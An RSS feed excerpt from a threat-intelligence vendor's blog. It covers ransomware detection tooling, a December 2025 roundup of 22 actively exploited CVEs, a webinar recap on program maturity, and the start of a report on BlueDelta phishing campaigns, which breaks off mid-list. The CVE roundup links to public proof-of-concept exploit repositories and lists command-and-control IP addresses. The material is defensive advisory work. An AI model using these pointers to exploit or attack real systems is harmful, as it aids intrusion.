          <li><strong>Risk Scoring:</strong> Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.</li>
        </ul>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Recorded Future</strong> delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.</li>
          <li><strong>Flashpoint</strong> specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.</li>
          <li><strong>Google Threat Intelligence (formerly Mandiant)</strong> combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.</li>
        </ul>
        <h2>Choosing the Right Ransomware Detection Tools</h2>
        <p>Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.</p>
        <p><strong>Security leaders should prioritize:</strong></p>
        <ul>
          <li><strong>Pre-encryption visibility:</strong> Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.</li>
          <li><strong>Context-rich alerts:</strong> Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.</li>
          <li><strong>Integration maturity:</strong> Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.</li>
          <li><strong>Operational efficiency:</strong> Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.</li>
          <li><strong>Relevance:</strong> Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.</li>
          <li><strong>Scalability:</strong> Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.</li>
        </ul>
        <h2>How Recorded Future Enables Early Ransomware Detection</h2>
        <p>The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing <a href="https://www.recordedfuture.com/blog/reduce-alert-fatigue">alert fatigue</a> draining analyst time on false positives instead of credible threats.</p>
        <p>Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.</p>
        <h3>Real-Time Relevance Through <a href="https://www.recordedfuture.com/products/secops-intelligence">SecOps Intelligence</a></h3>
        <p>Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.</p>
        <h3>Proactive Mitigation Through Vulnerability Intelligence</h3>
        <p>Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.</p>
        <p>The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.</p>
        <h3>Victimology and Anticipation</h3>
        <p>Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.</p>
        <p>This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.</p>
        <h2>Shifting From Reactive Response to Intelligence-Led Prevention</h2>
        <p>No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.</p>
        <p>Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>Can behavioral analytics alone stop zero-day ransomware variants?</h3>
              <p>While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the most common weakness of signature-based ransomware detection methods today?</h3>
              <p>The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?</h3>
              <p>Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?</h3>
              <p>Recorded Future's <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence Module</a> provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Is a dedicated deception technology platform considered a primary ransomware detection tool?</h3>
              <p>Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_195c3ebf5f4567c5e03d5fb20c8916aafc7cfb0e3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity]]></title>
            <link>https://www.recordedfuture.com/blog/december-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/december-2025-cve-landscape</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.]]></description>
            <content:encoded><![CDATA[
        <p>December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>22 vulnerabilities</strong> requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>React2Shell pandemonium:</strong> CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families</li>
          <li><strong>China-nexus exploitation intensifies:</strong> Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations</li>
          <li><strong>Public exploits proliferate:</strong> Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines</li>
          <li><strong>Legacy vulnerabilities resurface:</strong> CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps</li>
        </ul>
        <p><strong>Bottom line:</strong> December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in December 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMtKwC/overview">CVE-2025-55182</a></div>
            <div>99</div>
            <div>Meta React Server Components</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2025-55182&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBRk_r0/overview">CVE-2025-66644</a></div>
            <div>99</div>
            <div>Array Networks ArrayOS AG</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4U81/overview">CVE-2025-48572</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4lfv/overview">CVE-2025-48633</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>Insufficient Information</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaz1-z/overview">CVE-2025-59718</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/search?q=CVE-2025-59718&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBa2HBm/overview">CVE-2025-59719</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/moften/CVE-2025-59718-Fortinet-Poc">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaZM-R/overview">CVE-2025-62221</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMhTQJ/overview">CVE-2025-8110</a></div>
            <div>99</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBgciBg/overview">CVE-2025-14174</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/zeroxjf/CVE-2025-14174-analysis">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBhnuhP/overview">CVE-2025-14611</a></div>
            <div>99</div>
            <div>Gladinet CentreStack and Triofox</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div><a href="https://github.com/pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBsdjtE/overview">CVE-2025-59374</a></div>
            <div>99</div>
            <div>ASUS Live Update</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBtm5Fw/overview">CVE-2025-20393</a></div>
            <div>99</div>
            <div>Cisco Multiple Products</div>
            <div>CWE-20 (Improper Input Validation)</div>
            <div><a href="https://github.com/search?q=CVE-2025-20393&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQ0/overview">CVE-2025-43529</a></div>
            <div>99</div>
            <div>Apple Multiple Products</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5RY_KG/overview">CVE-2025-40602</a></div>
            <div>99</div>
            <div>SonicWall SMA1000 appliance</div>
            <div>CWE-250 (Execution with Unnecessary Privileges)</div>
            <div>No</div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBw5PCQ/overview">CVE-2025-14733</a></div>
            <div>99</div>
            <div>WatchGuard Firebox</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBx5LcP/overview">CVE-2025-14847</a></div>
            <div>99</div>
            <div>MongoDB and MongoDB Server</div>
            <div>CWE-130 (Improper Handling of Length Parameter Inconsistency)</div>
            <div><a href="https://github.com/search?q=CVE-2025-14847&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t9VBl0/overview">CVE-2023-52163</a></div>
            <div>99</div>
            <div>Digiever DS-2105 Pro</div>
            <div>CWE-862 (Missing Authorization)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/Z2-Qcf/overview">CVE-2018-4063</a></div>
            <div>99</div>
            <div>Sierra Wireless AirLink ALEOS</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BA5mEyi/overview">CVE-2025-58360</a></div>
            <div>99</div>
            <div>OSGeo GeoServer</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58360&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/7KUyzy/overview">CVE-2025-6218</a></div>
            <div>99</div>
            <div>RARLAB WinRAR</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-6218&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/neGcOR/overview">CVE-2022-37055</a></div>
            <div>99</div>
            <div>D-Link Routers</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hzmZuu/overview">CVE-2021-26828</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2021-26828&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in December 2025</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Fortinet</strong> continued vulnerability concerns with two critical authentication bypass flaws</li>
          <li><strong>Google</strong> faced three vulnerabilities across Android (2) and Chromium (1) platforms</li>
          <li><strong>Microsoft</strong> dealt with a Windows kernel use-after-free vulnerability</li>
          <li><strong>Meta</strong> experienced the month's most impactful vulnerability with React2Shell</li>
          <li>Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-22</strong> – Path Traversal</li>
          <li><strong>CWE-347</strong> – Improper Verification of Cryptographic Signature</li>
          <li><strong>CWE-416</strong> – Use After Free</li>
          <li><strong>CWE-434</strong> – Unrestricted Upload of File with Dangerous Type</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong><a href="https://www.recordedfuture.com/blog/critical-react2shell-vulnerability">React2Shell exploitation</a></strong> <strong>dominated December’s CVE activity:</strong></p>
        <ul>
          <li><strong>Threat actors observed to have exploited this vulnerability:</strong>
            <ul>
              <li><strong>China-nexus actors</strong> Earth Lamia and Jackpot Panda</li>
              <li><strong>China-linked clusters</strong> UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595</li>
              <li>North Korea-linked and financially motivated groups</li>
            </ul>
          </li>
          <li><strong>Observed payloads</strong> included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)</li>
          <li><strong>Infrastructure connections</strong> to HiddenOrbit relay infrastructure and GobRAT relay component</li>
        </ul>
        <p><strong>Additional activity:</strong></p>
        <ul>
          <li><strong>UAT-9686</strong> exploited Cisco Secure Email Gateway (<strong>CVE-2025-20393</strong>), deploying AquaShell, AquaPurge, and AquaTunnel</li>
          <li><strong>Unknown actors</strong> leveraged Gogs vulnerability (<strong>CVE-2025-8110</strong>) for Supershell malware deployment</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed widespread exploitation.</p>
        <h3>CVE-2025-55182 | Meta React Server Components (React2Shell)</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added December 5, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.</p>
        <p><strong>Affected versions:</strong></p>
        <ul>
          <li>React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)</li>
          <li>Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77</li>
          <li>Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin</li>
        </ul>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately</li>
          <li>Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5</li>
          <li>Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints</li>
          <li>Check logs for E{"digest" error patterns indicating exploitation attempts</li>
          <li>Review server processes for unexpected Node.js child processes</li>
        </ul>
        <p><strong>Exposure:</strong> ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c78e7d8c6ef475aeadada64b85462a8f66332e7c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2025-20393 | Cisco Secure Email Gateway</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by UAT-9686</p>
        <p><strong>Why this matters:</strong> Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.</p>
        <p><strong>Affected products:</strong> Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Cisco's security updates immediately</li>
          <li>Monitor Spam Quarantine web interface access logs</li>
          <li>Check for modifications to <code>/data/web/euq_webui/htdocs/index.py</code></li>
          <li>Hunt for AquaShell, AquaPurge, and AquaTunnel indicators</li>
          <li>Review outbound connections to suspicious IPs</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Practitioners Reveal What Makes Threat Intelligence Programs Mature]]></title>
            <link>https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat intelligence practitioners from Global Payments, Adobe, and Superhuman reveal how mature CTI programs transform data overload into strategic business value. Learn proven approaches to automation, cross-functional collaboration, and executive communication.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Intelligence drives better decisions.</strong> High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.</li>
          <li><strong>Maturity means efficiency.</strong> Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.</li>
          <li><strong>Information overload is the top challenge.</strong> Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.</li>
          <li><strong>AI will reshape the analyst role.</strong> While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.</li>
        </ul>
        <p>Recorded Future recently hosted two webinars to unpack key insights from the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">2025 State of Threat Intelligence Report</a> and hear directly from customers who are putting these findings into practice.</p>
        <p>Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.</p>
        <p>But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.</p>
        <h2>Intelligence as a strategic asset</h2>
        <p>Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”</p>
        <p>Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”</p>
        <p>Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”</p>
        <h2>How threat intelligence delivers organization-wide value</h2>
        <p>Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.</p>
        <p>Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”</p>
        <p>Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”</p>
        <p>Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”</p>
        <h2>The anatomy of a mature threat intelligence program</h2>
        <p>According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.</p>
        <p>“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.</p>
        <p>Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”</p>
        <h2>Pathways to advancing maturity</h2>
        <p>Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”</p>
        <p>Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”</p>
        <h2>Top challenges for CTI teams</h2>
        <p>The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”</p>
        <p>Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.</p>
        <h2>Looking to the future of threat intelligence</h2>
        <p>When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.</p>
        <p>Watch the recordings of the <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/8812722f-c797-43e5-8959-dafb91973948">North America</a> and <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/cd895838-6b18-4d3e-8d02-16287ee95642">EMEA</a> webinar sessions to learn more, and <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">download the 2025 State of Threat Intelligence Report</a> to see how your peers are evaluating, investing in, and operationalizing threat intelligence.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c3dce156d3f3b159e439a8f8b07b4b731d9082a8.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GRU-Linked BlueDelta Evolves Credential Harvesting]]></title>
            <link>https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting</guid>
            <pubDate>Wed, 07 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals how GRU-linked BlueDelta evolved credential-harvesting campaigns targeting government, energy, and research organizations across Europe and Eurasia.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was September 11, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 <a href="https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet">report</a>.</p>
        <p>Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.</p>
        <p>BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.</p>
        <p>BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.</li>
          <li>The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.</li>
          <li>Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.</li>
